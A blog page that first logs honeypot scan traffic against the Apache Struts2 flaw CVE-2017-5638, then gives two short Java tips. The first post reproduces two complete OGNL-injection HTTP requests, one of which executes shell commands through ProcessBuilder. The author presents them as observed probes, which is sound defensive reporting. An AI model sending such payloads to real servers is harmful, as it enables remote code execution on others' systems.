CVE-2017-5638 scanning still going on

I recently wrote a honey pot that i am currently playing around with. It did not take long before suspicious traffic started popping up. Many of the scans/hacking attempts are against CVE-2017-5638, which relates to a security issue in Apache Struts2 that started getting exploited in march 2017.

The scans/hacking attempts i have seen regarding this the last 24 hours are listed below, they do nothing more than to see if the seucurity hole exist.

Type 1:

GET / HTTP/1.1
Content-Type: %{(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#wmres=#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’]).(#wmres.getWriter().print(“S2-045 dir–***”)).(#wmreq=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletRequest’)).(#wmres.getWriter().println(#wmreq.getSession().getServletContext().getRealPath(“/”))).(#wmres.getWriter().flush()).(#wmres.getWriter().close())}.multipart/form-data
Accept: */*
Referer: http://**my Ihoneypot P**:81
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host:**my Ihoneypot P**:81
Connection: Keep-Alive

 

Type 2:

GET /index.action HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: */*
Content-Type: %{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’whoami’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,’echo windows–2017′}:{‘/bin/bash’,’-c’,’echo linux–2017′})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Host:**my Ihoneypot P**:81
Connection: Keep-Alive

java.io.file renameTo return false

Had a issue today where a java function which moves files stopped working. I realised that Java`s io.file.renameTo only throws Exceptions for some scenarios. For some errors, it will only return false when something goes wrong.

Only getting true/false on a rather vital operation is rather silly, so my “fix” was to move over to a library from Apache, aka FileUtils.

So now i simply do this: FileUtils.moveFile(oldFile, newFile);

That function actually throws exceptions when something fails 🙂

class Foo is public, should be declared in a file named Foo.java

When working with Java you might encounter this error. The reason for this is that you have tried to declare a public class in a file with a different name. Each java file can only contain one public java class, which is named the same as the java file itself. If you need another class inside your other class you should looking into private inner classes.